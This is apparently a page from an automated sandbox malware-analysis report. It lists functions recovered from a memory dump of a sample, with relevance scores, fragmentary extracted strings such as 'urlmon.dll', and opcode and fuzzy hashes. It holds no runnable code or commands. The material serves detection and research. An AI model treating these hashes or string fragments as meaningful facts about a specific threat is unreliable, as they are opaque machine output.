                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$%A$.$.^$/$5?$6$$7$;$@$A*$F$G$H:$I$K$Q$T9$U$VW$_;$g$lP$v$w$x$z${V$&$O$e
                                                • API String ID: 0-4103389139
                                                • Opcode ID: 055161716c9ee853759cc350a9cbc1408be8c11c8f6ca3284437e516e451e5e0
                                                • Instruction ID: 0cb500e693fc9f9e3f816de8f9f185270741f6e139c6947cc705bff1b15c398c
                                                • Opcode Fuzzy Hash: 055161716c9ee853759cc350a9cbc1408be8c11c8f6ca3284437e516e451e5e0
                                                • Instruction Fuzzy Hash: C4B134B0C05769CBEB60CF41C9987DEBAB5BB45308F1081D9C15C7B291CBBA0A89CF81
                                                Function 033088DA Relevance: 38.9, Strings: 31, Instructions: 149COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$%A$.$.^$/$5?$6$$7$;$@$A*$F$G$H:$I$K$Q$T9$U$VW$_;$g$lP$v$w$x$z${V$&$O$e
                                                • API String ID: 0-4103389139
                                                • Opcode ID: d89d11c5c9ca647fb5b86502987c7f474ffd387b0d9594930872f74c09fc39f5
                                                • Instruction ID: be51eab3c34ba6f5157bbe3068de45f7a0cbdb1ecc7a735681c37ccb3c381bc7
                                                • Opcode Fuzzy Hash: d89d11c5c9ca647fb5b86502987c7f474ffd387b0d9594930872f74c09fc39f5
                                                • Instruction Fuzzy Hash: 92B124B0C05769CBEB61CF41C9987DEBAB5BB45308F5081D9C15C7B291CBBA0A89CF91
                                                Function 03320EBA Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                • API String ID: 0-1002149817
                                                • Opcode ID: a5edf542b2afa331abcc1caf250d9b626b885a277746a6464f4da482ef592e5b
                                                • Instruction ID: fcdc698d7646a3432497fa712ecbad925fabdcb7452a4ed8f1ce30a12d6efd93
                                                • Opcode Fuzzy Hash: a5edf542b2afa331abcc1caf250d9b626b885a277746a6464f4da482ef592e5b
                                                • Instruction Fuzzy Hash: 4DC12FB5C013689EDB65DFA4CC84BEEBBB9EF45304F0085D9E508AB241E7B54A88CF51
                                                Function 033194DA Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                • API String ID: 0-392141074
                                                • Opcode ID: b8be667ac8ff53ac8def6cc512bef9c8edc87df79d86641a3ac06ce7ca91e795
                                                • Instruction ID: a031c25f55e8567b6c5f9f2a34b819df629d0c411bbd4cc659f89aef7f0e39a0
                                                • Opcode Fuzzy Hash: b8be667ac8ff53ac8def6cc512bef9c8edc87df79d86641a3ac06ce7ca91e795
                                                • Instruction Fuzzy Hash: 767161B6C00728AADB65DFD4CC81FEEB77DAF48701F044199E509BA150EB705B988FA1
                                                Function 033194D1 Relevance: 16.4, Strings: 13, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                • API String ID: 0-392141074
                                                • Opcode ID: faa3d45abe6a70efc9646c8722388b0cc527ac957f45957b1b84a17c319ac86c
                                                • Instruction ID: d6229bf52f391c757658d0c6d080a2850382e2b1fce1ddc00f1df2dbd160506e
                                                • Opcode Fuzzy Hash: faa3d45abe6a70efc9646c8722388b0cc527ac957f45957b1b84a17c319ac86c
                                                • Instruction Fuzzy Hash: F46161B5C00728AADB55DFA4CC81FEEBB7DAF48701F044199E509BA150EB705B98CFA1
                                                Function 0330D102 Relevance: 13.8, Strings: 11, Instructions: 90COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                • API String ID: 0-685823316
                                                • Opcode ID: 35c7cebd99f23caf5f91fd7b75d314528b3c6719823d9fbd3298e603691639a5
                                                • Instruction ID: 9c0c0188fe9f261b6bb8d724c37370a08c7bc9bfcc3fae42b4a35c5da694c3fd
                                                • Opcode Fuzzy Hash: 35c7cebd99f23caf5f91fd7b75d314528b3c6719823d9fbd3298e603691639a5
                                                • Instruction Fuzzy Hash: 5A31B3B5D40318AEEB14DF90CC84BEEBBB9BF08700F04814DE608BA180DBB556488BA4
                                                Function 033145D6 Relevance: 10.1, Strings: 8, Instructions: 134COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: .$P$e$i$m$o$r$x
                                                • API String ID: 0-620024284
                                                • Opcode ID: 2f0c5fdfc23d950d38afd1a209873d8d6d6d86bbf34c28cf487e2aae4cc24fe8
                                                • Instruction ID: d909e8e9f133e1236cf6281e4ba9fa6fd661dd728f54b53ba0e6fdad418bdf58
                                                • Opcode Fuzzy Hash: 2f0c5fdfc23d950d38afd1a209873d8d6d6d86bbf34c28cf487e2aae4cc24fe8
                                                • Instruction Fuzzy Hash: 334177B6C003287ADB25DBA0DC80FDE777DAF55300F0085D9A909AB141EBB557998FA1
                                                Function 0332171A Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: L$S$\$a$c$e$l
                                                • API String ID: 0-3322591375
                                                • Opcode ID: 3e19424aac13bcbdfd14f0e090490bbd961040568682d9be9b97f13943ae6f52
                                                • Instruction ID: 71ebf605afa171761cc213cd54c88ab0ca141716555a652bac1dd8765b0caefd
                                                • Opcode Fuzzy Hash: 3e19424aac13bcbdfd14f0e090490bbd961040568682d9be9b97f13943ae6f52
                                                • Instruction Fuzzy Hash: 25417676C0422CAADF14DFA8DCC4BEFBBB9BF49310F05415AE909A7100E77159458B94
                                                Function 0331928B Relevance: 7.7, Strings: 6, Instructions: 176COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: F$P$T$f$r$x
                                                • API String ID: 0-2523166886
                                                • Opcode ID: 85a5e242a1f861712ff28912f88f61daffa588b072cf4fffbd4dfea16e177e72
                                                • Instruction ID: 51fea028f52bb879b1f473277447fa7b49474f7ab6d6fb1d7b075827b1378faf
                                                • Opcode Fuzzy Hash: 85a5e242a1f861712ff28912f88f61daffa588b072cf4fffbd4dfea16e177e72
                                                • Instruction Fuzzy Hash: 4A510671D00315AEE738DFA4CC94BEAF7F8EF06310F044659E5095A180DBB4A594CBE1
                                                Function 03305B9A Relevance: 7.5, Strings: 6, Instructions: 43COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: *$1$?$A$G$m
                                                • API String ID: 0-849330469
                                                • Opcode ID: 51aeca661fb4a5f42f9f241bb1458c69b7ff72f6b563887085c294449dbcf931
                                                • Instruction ID: 73808edebdd40098dc5551223425ee1f71e8fa476add56510a3ff6aa3b3f2234
                                                • Opcode Fuzzy Hash: 51aeca661fb4a5f42f9f241bb1458c69b7ff72f6b563887085c294449dbcf931
                                                • Instruction Fuzzy Hash: 4C11D010D0C7CEDDDB12CABC84486ADBF755F13224F0883D9D5A52B2D2D2794746C7A6
                                                Function 033189AA Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $i$l$o$u
                                                • API String ID: 0-2051669658
                                                • Opcode ID: 7d97bc2e228f3eee062e53d856fa2b298b011ecacd539c90672b9f3e90762185
                                                • Instruction ID: 693693cab1e323c258da2be5b5982a7f38f493f54f7956fd84d4634fa81a01ff
                                                • Opcode Fuzzy Hash: 7d97bc2e228f3eee062e53d856fa2b298b011ecacd539c90672b9f3e90762185
                                                • Instruction Fuzzy Hash: C56151B5900308AFDB28DBA4CC80FEFB7FDAF48710F148559E559AB240E735AA51CB60
                                                Function 03318637 Relevance: 5.3, Strings: 4, Instructions: 302COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                • Opcode ID: 66276c20f4c92f332618f915248220346e6e3dc594a1bab775f10f3a736df355
                                                • Instruction ID: a6d0a4d2fd272298bf0b9f464672bf8ac3abb07cf83c83c3584988e8dd8b70ef
                                                • Opcode Fuzzy Hash: 66276c20f4c92f332618f915248220346e6e3dc594a1bab775f10f3a736df355
                                                • Instruction Fuzzy Hash: 53B11CB5A00308AFDB28DBA4CC85FEFB7BDAF88700F148558F6599B240D775AA51CB50
                                                Function 03318F64 Relevance: 5.2, Strings: 4, Instructions: 239COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$h$o
                                                • API String ID: 0-3662636641
                                                • Opcode ID: fe1aef5aae9cc431240889e2257ede0640eb3cc27afc8a7358d35d8c3ac242b0
                                                • Instruction ID: 30d9e723d62950567b94fa8efeaedcac9ab2ebb863f14951a4bfba1374f5670e
                                                • Opcode Fuzzy Hash: fe1aef5aae9cc431240889e2257ede0640eb3cc27afc8a7358d35d8c3ac242b0
                                                • Instruction Fuzzy Hash: EB8151B6C003696EDB25EB90CC84FEE777DEF49300F40859AE509AA040EB746B54CFA5
                                                Function 0331863A Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$k$o
                                                • API String ID: 0-3624523832
                                                • Opcode ID: b8e1a10c579474810a33d166109e061946e9d6395994342159449d76034cf771
                                                • Instruction ID: be6cb1e4db461f2c85143d46aa42dccc284ddbe9a5a873dc55ac72c17283d823
                                                • Opcode Fuzzy Hash: b8e1a10c579474810a33d166109e061946e9d6395994342159449d76034cf771
                                                • Instruction Fuzzy Hash: D5611CB5A00308AFDB24DFA4CC85FEFB7BDAF88700F148558E6599B244DB71AA41CB50
                                                Function 033184F7 Relevance: 5.1, Strings: 4, Instructions: 124COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                • API String ID: 0-2877786613
                                                • Opcode ID: 68761215b75a05da6f3624ea2e34835aa2db32f3c83a61cd3ea5af90a452a1b7
                                                • Instruction ID: cc74f8e19e76b2c31494953902f073ca25d693766cc883a806736f64c4c1f430
                                                • Opcode Fuzzy Hash: 68761215b75a05da6f3624ea2e34835aa2db32f3c83a61cd3ea5af90a452a1b7
                                                • Instruction Fuzzy Hash: CD413E75951228BAEB11EB90CC81FEF7B7CEF56600F004549FA04AE180E7746A2687A6
                                                Function 033184FA Relevance: 5.1, Strings: 4, Instructions: 120COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                                • API String ID: 0-2877786613
                                                • Opcode ID: 6e9167da7a236cfef1f647ff638c98e2965f4d0076ef742063712561abd7688c
                                                • Instruction ID: 25df1bb9da3d6cdad75b7b49fdfa791f0bc45ec68245c048b1036ad9861b738f
                                                • Opcode Fuzzy Hash: 6e9167da7a236cfef1f647ff638c98e2965f4d0076ef742063712561abd7688c
                                                • Instruction Fuzzy Hash: 463132759513287EEB11EF90CC81FEF7B7CEF56600F004545FA046E180E7746A2687A6
                                                Function 03318F6A Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $e$h$o
                                                • API String ID: 0-3662636641
                                                • Opcode ID: 490f29361cf7f8708a80fc0d1995516548d9abbc8d4615129ebcbe118afa607d
                                                • Instruction ID: 5975b55f7200ad4a859c0a05a9feb38b39fc72c7498f4730cbe7688dfd1112c9
                                                • Opcode Fuzzy Hash: 490f29361cf7f8708a80fc0d1995516548d9abbc8d4615129ebcbe118afa607d
                                                • Instruction Fuzzy Hash: 95414E71C003696EDB25EBA4CC81BDEB7BCEF49300F4085DAA509BA140EB746B54CFA5
                                                Function 033147BA Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 2$6$7$l
                                                • API String ID: 0-2874435242
                                                • Opcode ID: 0391c932a7062bfebad856640528a2ec10a0df001789bde954bfcc6254dd7829
                                                • Instruction ID: 03fb4ed6cf5dea2abd0208f7144726cc3e0d5e14ec4cf895ffc737dc9d622ec2
                                                • Opcode Fuzzy Hash: 0391c932a7062bfebad856640528a2ec10a0df001789bde954bfcc6254dd7829
                                                • Instruction Fuzzy Hash: B5314375D10219ABDF04DB94CC81BEEB7B8EF49304F008159F904AB240E772AA558BE5
                                                Function 03301F1A Relevance: 5.0, Strings: 4, Instructions: 23COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2688494135.0000000003100000.00000040.00000001.00040000.00000000.sdmp, Offset: 03100000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_3100000_mDeEygzSIDmBTP.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: W$l&jg$l&jgyn$yn
                                                • API String ID: 0-1759271319
                                                • Opcode ID: 39d37acd58790fa720db572736da68c90a4e14959f38a8a4eeff9a8f37f8bd98
                                                • Instruction ID: c4290b4408c6b4b0b87d9aa94ad832f6322f1125b01b71c17dd5997f8d4b27c2
                                                • Opcode Fuzzy Hash: 39d37acd58790fa720db572736da68c90a4e14959f38a8a4eeff9a8f37f8bd98
                                                • Instruction Fuzzy Hash: 38E092B4C0424CAACB04EFE8D8466AEBB78BF01200F104AD9E9949B241D7749A44CB85